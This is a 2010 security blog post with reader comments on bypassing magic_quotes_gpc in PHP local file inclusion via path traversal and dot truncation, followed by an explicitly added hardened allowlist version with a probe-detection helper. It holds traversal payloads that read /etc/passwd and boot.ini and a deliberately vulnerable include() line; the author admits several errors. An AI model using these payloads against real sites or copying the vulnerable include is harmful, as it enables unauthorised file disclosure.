So, let's look at a piece of code:
<?php include('inc/'.$_GET['page'].'.php'); ?>
Normally, you would use the null byte (%00) to exploit it:
vuln.php?page=../../../../../etc/passwd%00
but if magic_quotes_gpc is enabled then the null byte (%00) will get converted to \0, so the attack will fail.
How to bypass this: if you add a large number of dots (.....) then the null byte escaping no longer matters, because a null byte is not required at all. e.g.
vuln.php?page=../../../../../etc/passwd%00....................(200 dots in this case)
vuln.php?page=../../../../../etc/passwd....................(200 dots in this case)
Correction: You don’t need null byte here.
Update: As pointed out by Bogdan, this only works on Windows. So replace /etc/passwd with /../../boot.ini. I will provide a POC link.
Tested on PHP version 5.2.12 (WAMP environment).
References: http://www.xakep.ru/post/50862/novaya_veha_v_teorii_include.rar
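Since the whole problem is that a user-controlled string reaches include() at all, the fix is not to fiddle with null bytes or dots but to never build an include path from raw input. The snippet below is an added example (not the post's code, and not from notsosecure.com): it replaces the vulnerable one-liner with an allowlist lookup plus a realpath() containment check, and adds a small helper that flags the request patterns discussed in this post (traversal sequences, null bytes, long runs of dots) so they can be logged. The page names in ALLOWED_PAGES and the inc/ directory are assumptions for the example.

```php
<?php
// Added example: hardened replacement for
//   include('inc/'.$_GET['page'].'.php');
// Assumes page files live under inc/ and are named by a short identifier.
declare(strict_types=1);

const PAGE_DIR = __DIR__ . '/inc';
// Assumed set of legitimate page names; anything else is rejected outright.
const ALLOWED_PAGES = ['home', 'about', 'contact'];

/**
 * Return true if a raw parameter value looks like the LFI probes from this
 * post: "../" or "..\" traversal, an embedded null byte, or a long run of
 * dots used to push the appended ".php" past the path length limit.
 * Intended for logging and alerting, not as the only defence.
 */
function looksLikeTraversal(string $value): bool
{
    if (strpos($value, "\0") !== false) {
        return true;
    }
    if (preg_match('#\.\.[/\\\\]#', $value) === 1) {
        return true;
    }
    // 32+ consecutive dots has no legitimate use in a page name.
    return preg_match('/\.{32,}/', $value) === 1;
}

/**
 * Map a user-supplied page name to a file path, or return null.
 * The allowlist is the real control: dots, slashes, null bytes and the
 * state of magic_quotes_gpc never influence which file is opened.
 * The realpath() check is defence in depth in case the allowlist is
 * later relaxed to something pattern-based.
 */
function resolvePage(string $page): ?string
{
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $real = realpath(PAGE_DIR . '/' . $page . '.php');
    if ($base === false || $real === false) {
        return null;
    }
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null; // resolved outside inc/, refuse
    }
    return $real;
}

$page = isset($_GET['page']) ? (string) $_GET['page'] : 'home';

if (looksLikeTraversal($page)) {
    // Keep the raw value out of the log line; record its length and hash instead.
    error_log(sprintf('LFI probe from %s: len=%d sha1=%s',
        $_SERVER['REMOTE_ADDR'] ?? '-', strlen($page), sha1($page)));
}

$path = resolvePage($page);
if ($path === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $path;
```

Two points on the design: the allowlist means the include path is chosen from constants, so the truncation trick in the post has nothing to truncate, and the detection helper is there only so that probes show up in logs. Note that magic_quotes_gpc was deprecated in PHP 5.3 and removed in 5.4, and include() rejects paths containing a null byte since PHP 5.3.4, so neither the %00 variant nor the magic_quotes discussion applies to a current PHP; the dot-truncation behaviour on Windows is the one that deserves a test against whatever version is actually deployed.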
11:45 am on February 2nd, 2010
Good one Sid!
12:04 pm on February 2nd, 2010
i wanna see a printscreen
12:13 pm on February 2nd, 2010
No, it’s not about the null byte. It works like this vuln.php?page=../../../../../etc/passwd….(lots of dots). With the null byte it doesn’t work.
It only works on Windows AND it only works if the include is relative.
If you have something like:
include "d:\\xampp\\htdocs\\test\\" . $_GET['i'] . ".txt"; it doesn't work.
12:18 pm on February 2nd, 2010
Hi Bogdan,
I have only tested it on Windows. While the backslash (\) will get escaped by magic_quotes, the forward slash will not be escaped, so that explains why it will only work if the include is relative on Windows.
I can confirm that in my Windows setup it worked with the null byte. As you pointed out, it doesn't work with the null byte and the null byte is actually not required.
4:07 pm on February 2nd, 2010
Hi,
Very interesting, only I am not able to reproduce it. I tested from 100 to > 4096 dots; this does not disable the NULL byte from being escaped.
You say you tested on WAMP? i.e. Windows? How can /etc/passwd work on Windows?
I tried on Windows also, and it failed. Could you please explain or give POC code?
Thanks
4:16 pm on February 2nd, 2010
Hi skully, please see the update, you don't need magic_quotes at all. I managed to make so many mistakes in a small blog post.
6:16 am on February 3rd, 2010
Similar stuff is possible on linux: http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
2:28 pm on February 8th, 2010
[...] Local File Inclusion with Magic_quotes_gpc enabled – notsosecure.com Penetration using magic_quote_gpc and PHP [...]
8:42 pm on May 24th, 2010
I did try with etc/passwd%00
but that does not work.
Any idea?